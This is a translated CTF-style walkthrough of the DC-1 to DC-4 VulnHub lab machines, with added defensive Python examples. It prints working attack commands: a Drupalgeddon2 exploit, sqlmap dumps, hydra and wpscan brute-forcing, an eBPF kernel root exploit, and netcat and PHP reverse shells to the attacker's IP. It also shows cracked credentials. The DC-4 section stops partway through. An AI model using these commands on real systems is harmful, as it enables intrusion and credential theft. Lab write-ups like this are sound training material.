This article walks through the penetration test of the DC-1 target machine.
Knowledge points involved (fairly basic):
nmap scanning of subnet ports and services
exploit search in msf
exploiting command execution in Drupal 7
netcat reverse shell
basic MySQL operations
SUID privilege escalation
Target download: http://www.five86.com/downloads/DC-1.zip
https://download.vulnhub.com/dc/DC-1.zip
VMware (Windows): https://www.52pojie.cn/thread-1026907-1-1.html
Choose a recent version of VMware; older versions may not support OVA import.
After downloading and importing, boot the VM and set its network to NAT mode so that the attacking machine and the target are on the same subnet; adjust this to your own network environment, as long as both are on one subnet.
nmap -A 192.168.124.0/24
Scan result
Ports 80, 111 and 22 (SSH) are open
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4     111/tcp     rpcbind
|   100000  2,3,4     111/udp     rpcbind
|   100000  3,4       111/tcp6    rpcbind
|   100000  3,4       111/udp6    rpcbind
|   100024  1         37454/udp   status
|   100024  1         39208/udp6  status
|   100024  1         52048/tcp   status
|_  100024  1         57763/tcp6  status
MAC Address: 00:0C:29:A6:59:A3 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.124.145
nmap --script=ssh-brute 192.168.124.145
Tried registering, logging in with weak passwords and the password-reset function; none worked, but it showed that the admin user exists.
Wappalyzer fingerprinting shows it is a Drupal site.
msfconsole search Drupal
There is an exploit available, so let's move on to msf.
Use the 2018 vulnerability, a remote code execution (I honestly can't follow the code audit yet 😔)
https://www.exploit-db.com/exploits/44482
https://paper.seebug.org/567/
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.124.145
run
shell
find / -name flag*
/home/flag4
/home/flag4/flag4.txt
/var/www/flag1.txt
Open flag1.txt and have a look
cat /var/www/flag1.txt
Translation: every good CMS needs a config file, and you do too.
Search for Drupal's config file:
/var/www/sites/default/settings.php, open it
cat /var/www/sites/default/settings.php
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
First get an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
Connect to the database and try it
mysql -u dbuser -pR0ck3t
(no space between -p and the password; with a space, mysql prompts for the password and treats R0ck3t as the database name)
select * from node;
select * from users;
Why look at the node table??? (The users table needs no explanation.)
Because of Drupal's node mechanism.
Understanding Drupal's node mechanism (reference)
So, trying to obtain the login password: cracking the hash is probably unrealistic.
Could we register an account and swap the two hashes?
Damn, that doesn't work: registration doesn't let you set a password,
so just find the hashing script and hash one ourselves.
Hash script location:
scripts/password-hash.sh
php scripts/password-hash.sh admin
password: admin 		hash: $S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.
Try replacing the administrator's password hash
update users set pass='$S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.' where name='admin';
Now test the login with account admin and password admin.
Found under Content:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
It seems we need administrator privileges, then go and look at /etc/shadow.
Tried granting ourselves permissions; still no good.
So privilege escalation is the only option.
SUID is short for set uid. It appears in the execute bit of the file owner's permissions and is shown as s. When SUID is set, the leading digit of the octal mode is 4. As we know, account passwords are stored in /etc/shadow, whose permissions are ----------, meaning only root can operate on that file and other users cannot even read it. When an ordinary user wants to change their own password, they use the passwd command. passwd lives at /bin/passwd, and after we run it the password in /etc/shadow is changed. So why can we modify a file we have no permission on through the passwd command? This is where SUID comes in: SUID makes the command run with the privileges of the command's owner, i.e. root, which means that when an ordinary user runs passwd they have root's privileges and can therefore modify the /etc/passwd file.
Reference: Users, groups and permissions on Linux
Known Linux binaries that can be used for privilege escalation include:
nmap, vim, find, bash, more, less, nano, cp
Find all SUID executables on the system
Different commands suit different systems:
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Check whether find has the SUID bit
/usr/bin/find /tmp -exec whoami \;
Notes on the find command
The -exec parameter is followed by the command to run, which is terminated by ;, so the semicolon at the end of this command cannot be omitted; because ; has different meanings in different shells, it is escaped with a backslash. Whatever follows -exec is the command we want to run, so we can now run commands with root's privileges.
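The SUID audit described above (the find commands and the list of binaries that can escape to a shell), plus the world-writable 4777 mode that the DC-4 write-up later plants via cron, as a defender's check. This is an added Python example, not part of the original walkthrough; walk_suid() mirrors find / -perm -4000 -type f, and the EXPECTED_SUID baseline is an assumption to tune per distribution.

```python
import os
import stat
from typing import Iterable, List, Tuple

# Binaries the walkthrough names as usable for privilege escalation when SUID-root.
RISKY_SUID_NAMES = {"nmap", "vim", "find", "bash", "more", "less", "nano", "cp"}

# Assumption: binaries that are legitimately SUID-root on a stock Debian/Ubuntu;
# tune this baseline for the distribution you audit.
EXPECTED_SUID = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                 "gpasswd", "newgrp", "ping", "pkexec"}


def walk_suid(root: str = "/") -> Iterable[Tuple[str, int, int]]:
    """Yield (path, st_mode, st_uid) for every regular file under `root` with the
    SUID bit set; the Python counterpart of `find / -perm -4000 -type f 2>/dev/null`.
    Directories we cannot enter are skipped rather than aborting the walk."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid


def classify(entries: Iterable[Tuple[str, int, int]]) -> List[Tuple[str, str]]:
    """Label each SUID file, most severe check first:
      world-writable  - anyone can replace the code that runs with the owner's uid
                        (the `chmod 4777 /bin/sh` cron trick in the DC-4 write-up)
      suid-non-root   - SUID but the owner is not root; odd, worth a look
      risky           - root-owned binary from the walkthrough's escalation list
      expected        - part of the distro baseline
      unexpected      - root-owned SUID file that is not in the baseline"""
    findings = []
    for path, mode, uid in entries:
        name = os.path.basename(path)
        if mode & stat.S_IWOTH:
            label = "world-writable"
        elif uid != 0:
            label = "suid-non-root"
        elif name in RISKY_SUID_NAMES:
            label = "risky"
        elif name in EXPECTED_SUID:
            label = "expected"
        else:
            label = "unexpected"
        findings.append((path, label))
    return findings


def audit(root: str = "/") -> List[Tuple[str, str]]:
    """Run the walk and return only the entries an admin should act on."""
    return [f for f in classify(walk_suid(root)) if f[1] != "expected"]


if __name__ == "__main__":
    for path, label in audit():
        print(f"{label:15} {path}")
```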
Spawn a shell; of course, with find and command execution we could also leave a root netcat backdoor
/usr/bin/find ./aaa -exec '/bin/sh' \;
/usr/bin/find ./aaa -exec netcat -lvp 4444 -e "/bin/sh" \;
netcat 192.168.124.145 4444
Finally, get the last flag
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
freebuf: https://www.freebuf.com/articles/network/218073.html
Zhihu: https://zhuanlan.zhihu.com/p/135342104
W3: https://medium.com/@w3rallmachines/dc-1-vulnhub-walkthrough-3a2e7042c640
Target download: http://www.five86.com/downloads/DC-2.zip
A basic nmap scan finds the IP 192.168.124.146 with port 80 open, running the WordPress framework
nmap -A 192.168.124.0/24
Nmap scan report for dc-2 (192.168.124.146)
Host is up (0.00036s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:94:8C:B4 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
A further port scan finds port 7744 open (not sure what service it is; probably SSH):
nmap -sS 192.168.124.146 -p 1-65535
Nmap scan report for dc-2 (192.168.124.146)
Host is up (0.00094s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
Visiting 192.168.124.146 doesn't work; the local hosts file (DNS mapping) needs to be changed
Linux: vim /etc/hosts
Windows: C:\Windows\System32\drivers\etc
Visiting it confirms it is a WordPress site
There is a flag; clicking it hints to use cewl to get passwords, so this should be a password brute-force; it also says your usual password dictionary may not work, that you sometimes cannot get every password, and suggests logging in as a different user
cewl crawls a website, collects key words and builds a password dictionary from them
cewl http://dc-2/index.php/flag/ -w dict.txt
-w: name of the output file
The site is WordPress, so enumerate users; since a password was hinted, it should be for logging in
Use the wpscan tool:
WPScan is a vulnerability scanner shipped by default with Kali Linux. Written in Ruby, it can scan WordPress sites for many kinds of security vulnerabilities, including theme vulnerabilities, plugin vulnerabilities and vulnerabilities in WordPress itself. The latest version's database contains more than 18,000 plugin vulnerabilities and 2,600 theme vulnerabilities, and it supports the latest version of WordPress. Notably, it not only scans sensitive files such as robots.txt but also detects the currently enabled plugins and other features.
The scanner can retrieve the site's usernames, all installed plugins and themes, and the vulnerable plugins and themes together with their vulnerability information. It can also brute-force usernames and passwords on unprotected WordPress sites.
Enumerate users: admin, jerry and tom are found
wpscan --url http://dc-2 --enumerate u
[+] URL: http://dc-2/ [192.168.124.146]
[+] Started: Sat Nov 7 02:23:05 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
Brute-force usernames and passwords
touch users.txt
Save the usernames admin, jerry and tom into it
Brute-force with the dictionary just crawled and the user list
wpscan --url http://dc-2/ -U users.txt -P dict.txt
[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient
Two username/password pairs were cracked, none for admin
The hint says WordPress offers no shortcut, so try another route: nmap found port 7744 earlier, so can we try an SSH login?
Login with the tom account succeeds
ssh tom@192.168.124.146 -p 7744
password: parturient
We're in rbash, i.e. a restricted shell
Reference link: freebuf
First test whether "/" can be used
The cp command
FTP, GDB, main and git are not available; vi is, so try it
vi test
:set shell=/bin/sh
:shell
Change the PATH or SHELL environment variable
View with export -p
export HOME='/home/tom'
export LANG='en_US.UTF-8'
export LOGNAME='tom'
export MAIL='/var/mail/tom'
export PATH='/home/tom/usr/bin'
export PWD='/home/tom'
export SHELL='/bin/rbash'
export SHLVL='1'
export SSH_CLIENT='192.168.124.139 51336 7744'
export SSH_CONNECTION='192.168.124.139 51336 192.168.124.146 7744'
export SSH_TTY='/dev/pts/1'
export TERM='xterm-256color'
export USER='tom'
export VIM='/usr/share/vim'
export VIMRUNTIME='/usr/share/vim/vim74'
export _='whoami'
Modify PATH:
export PATH="/usr/sbin:/usr/bin:/rbin:/bin"
Open flag3.txt; the hint is to switch user to jerry
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. 😃
Go on - git outta here!!!!
sudo git help config
Root obtained; read the file
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Target download: http://www.five86.com/downloads/DC-3-2.zip
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.147
Host is up (0.00041s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:EF:73:10 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.124.147
A further port scan found no other ports
nmap 192.168.124.147
Visiting port 80 on 192.168.124.147 shows a hint; the CMS is Joomla
Use joomscan for a further scan
joomscan is a Joomla scanner; it helps web developers and site administrators identify security vulnerabilities that a deployed Joomla site may have.
Install joomscan (in Kali):
apt-get install joomscan
joomscan --url http://192.168.124.147
CMSeeK can also be used for a further scan
Install CMSeeK:
git clone https://github.com/Tuhinshubhra/CMSeeK
Usage:
python3 cmseek.py --url 192.168.124.147
Same information as before
searchsploit joomla 3.7.0
Open it and read the vulnerability details
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
It is a SQL injection; for the detailed principle see seebug
In short:
the com_fields component does not filter request data, which leads to SQL injection; the unfiltered location:
Test it
http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)
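The root cause just described (the list[fullordering] value concatenated into ORDER BY) shown as the vulnerable query builder next to an allow-listed one, plus a log-review rule that catches the test payload above. This is an added Python example, not Joomla's own code; the column names in ALLOWED_ORDERING are assumptions.

```python
import re
import urllib.parse

# Assumption: the columns this list view may legitimately sort on. The real
# component's names may differ; what matters is that the set is closed.
ALLOWED_ORDERING = {"a.id", "a.title", "a.name", "a.type", "a.state", "a.ordering"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

# The write-up's test URL, used as the sample request.
PAGE_TEST_URL = ("http://192.168.124.147/index.php?option=com_fields&view=fields"
                 "&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)")


def fullordering_from_url(url: str) -> str:
    """Extract list[fullordering] from a request URL (empty string if absent)."""
    params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    values = params.get("list[fullordering]")
    return values[0] if values else ""


def order_by_unsafe(fullordering: str) -> str:
    """The vulnerable shape: the request value goes into ORDER BY verbatim, so an
    error-based expression such as updatexml(...) is evaluated by MySQL."""
    return "SELECT * FROM #__fields AS a ORDER BY " + fullordering


def order_by_safe(fullordering: str) -> str:
    """The hardened shape: accept exactly '<column> <ASC|DESC>' with both parts
    taken from closed allow-lists; anything else is rejected before SQL is built."""
    parts = fullordering.strip().split()
    if len(parts) != 2:
        raise ValueError(f"rejected ordering value: {fullordering!r}")
    column, direction = parts[0], parts[1].upper()
    if column not in ALLOWED_ORDERING or direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected ordering value: {fullordering!r}")
    return f"SELECT * FROM #__fields AS a ORDER BY {column} {direction}"


def safe_rejects(fullordering: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        order_by_safe(fullordering)
    except ValueError:
        return True
    return False


SQLI_FUNCS = re.compile(r"\b(updatexml|extractvalue|sleep|benchmark)\s*\(", re.I)
PLAIN_ORDERING = re.compile(r"[A-Za-z_][\w.]*\s+(ASC|DESC)", re.I)


def looks_like_injection(value: str) -> bool:
    """Log/WAF review rule: flag the error-based functions used in the write-up,
    or any ordering value that is not a bare 'column ASC|DESC'."""
    if SQLI_FUNCS.search(value):
        return True
    return PLAIN_ORDERING.fullmatch(value.strip()) is None


if __name__ == "__main__":
    payload = fullordering_from_url(PAGE_TEST_URL)
    print("unsafe query        :", order_by_unsafe(payload))
    print("safe builder rejects:", safe_rejects(payload))
    print("looks like injection:", looks_like_injection(payload))
```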
Dump database names:
sqlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" --dbs
Dump table names:
sqlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" -D "joomladb" --tables
Dump column names:
sqlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" -D "joomladb" -T "#__users" --columns
Dump data:
sqlmap -u "http://192.168.124.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,database()),1)" -D "joomladb" -T "#__users" -C name,password --dump
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
Create a file:
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > test
Crack the password:
john test
john test --show
John the Ripper ("JtR") is a very useful tool: a fast password cracker for Windows and many Linux systems, with many features that work wonders on many kinds of password cracking.
Log in to the site: http://192.168.124.147/administrator/
Create a new page
Click Edit
Create a new file and write to it
Try SUID privilege escalation
find / -perm -u=s -type f 2>/dev/null
No escalatable program found
Tried command-based escalation; no use
Try Linux kernel privilege escalation
uname -a
cat /etc/issue
Look for a kernel exploit script
searchsploit Ubuntu 16.04
Give it a try
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows:

/* look for pseudo eBPF instructions that access map FDs and
 * replace them with actual map pointers
 */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
	struct bpf_insn *insn = env->prog->insnsi;
	int insn_cnt = env->prog->len;
	int i, j;

	for (i = 0; i < insn_cnt; i++, insn++) {
		[checks for bad instructions]

		if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
			struct bpf_map *map;
			struct fd f;

			[checks for bad instructions]

			f = fdget(insn->imm);
			map = __bpf_map_get(f);
			if (IS_ERR(map)) {
				verbose("fd %d is not pointing to valid bpf_map\n", insn->imm);
				fdput(f);
				return PTR_ERR(map);
			}

			[...]
		}
	}
	[...]
}

__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table is shared with another task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause the reference count of the struct file to be over-decremented, allowing an attacker to create a use-after-free situation where a struct file is freed although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file's writability, then free the writable file and open a readonly file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to write data to a readonly file. By e.g. writing to /etc/crontab, root privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated struct file is located at the same address as the previously freed one. Linux provides a syscall that performs exactly this comparison for the caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.) writev() calls do_writev(), which looks up the struct file * corresponding to the file descriptor number and then calls vfs_writev(). vfs_writev() verifies that the target file is writable, then calls do_readv_writev(), which first copies the struct iovec from userspace using import_iovec(), then performs the rest of the write operation. Because import_iovec() performs a userspace memory access, it may have to wait for pages to be faulted in - and in this case, it has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, allowing the attacker to suspend code execution in the kernel at that point arbitrarily.

An exploit that puts all this together is in exploit.tar.

Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7

Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
The exploit's download address is given; download it
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Unzip it, upload it to the target, and extract:
tar -xf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
First get an interactive reverse shell
Create a phpshell.php file and write:
<?php $sock=fsockopen("192.168.124.139",4444); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Kali side
netcat -l -p 4444
Execute it through AntSword
php phpshell.php
Kali receives the reverse shell
Run the exploit compiled earlier
Privilege escalation succeeded
Look for the flag under /root
Got the flag
[ASCII-art banner]

Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges, please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
http://www.javashuo.com/article/p-zwnkvlay-nw.html
https://www.exploit-db.com/exploits/44227
Target download: https://download.vulnhub.com/dc/DC-4.zip
nmap subnet scan
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.148
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:40:C9:C1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.124.148
Basic information: ports 80 and SSH are open; the OS is Debian
Brute-force SSH first (no result)
nmap --script=ssh-brute 192.168.124.148
Port 80 is not a CMS but a login form, which asks for an admin login
Tried SQL injection; ran a dictionary through Burp Suite with no result; ran it again to check for filtering (damn, still nothing), so it seems there is no injection
Let me Baidu the write-up... damn, it's plain password brute force; time to bring out my 1-million-entry dictionary (heng!)
Didn't crack it either, so I looked straight at the answer (not happy at all); the dictionary is somewhat outdated
Account: admin  Password: happy
After logging in there's a command-execution feature; capture the request, change the ls command, and it can read files; first read the source comment to see how it executes
Damn, it calls shell_exec() directly, so just spawn a reverse shell
nc 192.168.124.139 4444 -e /bin/bash
Kali side:
netcat -l -p 4444
Upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/sh")'
old-passwords.bak was found in the following directory
/home/jim/backups
Said to be old passwords; open it
cat old-passwords.bak
Build a brute-force dictionary from it and brute-force SSH
Use hydra for the brute force. Hydra is an open-source password brute-forcing tool from the well-known hacker group THC; it can crack many kinds of passwords online.
Cracking SSH:
hydra -l <username> -P <wordlist> -t <threads> -vV -e ns <ip> ssh
hydra -l <username> -P <wordlist> -t <threads> -o save.log -vV <ip> ssh
Cracking FTP:
hydra <ip> ftp -l <username> -P <wordlist> -t <threads, default 16> -vV
hydra <ip> ftp -l <username> -P <wordlist> -e ns -vV
Brute-force SSH:
hydra -l jim -P passwd.txt -t 10 ssh://192.168.124.148
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-10 08:38:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 252 login tries (l:1/p:252), ~26 tries per task
[DATA] attacking ssh://192.168.124.148:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 142 to do in 00:02h, 10 active
[STATUS] 80.00 tries/min, 160 tries in 00:02h, 92 to do in 00:02h, 10 active
[22][ssh] host: 192.168.124.148   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-10 08:41:16
SSH account: jim, password: jibril04
Read the mail
/var/mail/jim
It tells us an account and password
Password is: ^xHhA&hvim0y See ya, Charles
Switch user
su charles
Check which commands can be run as root
sudo -l
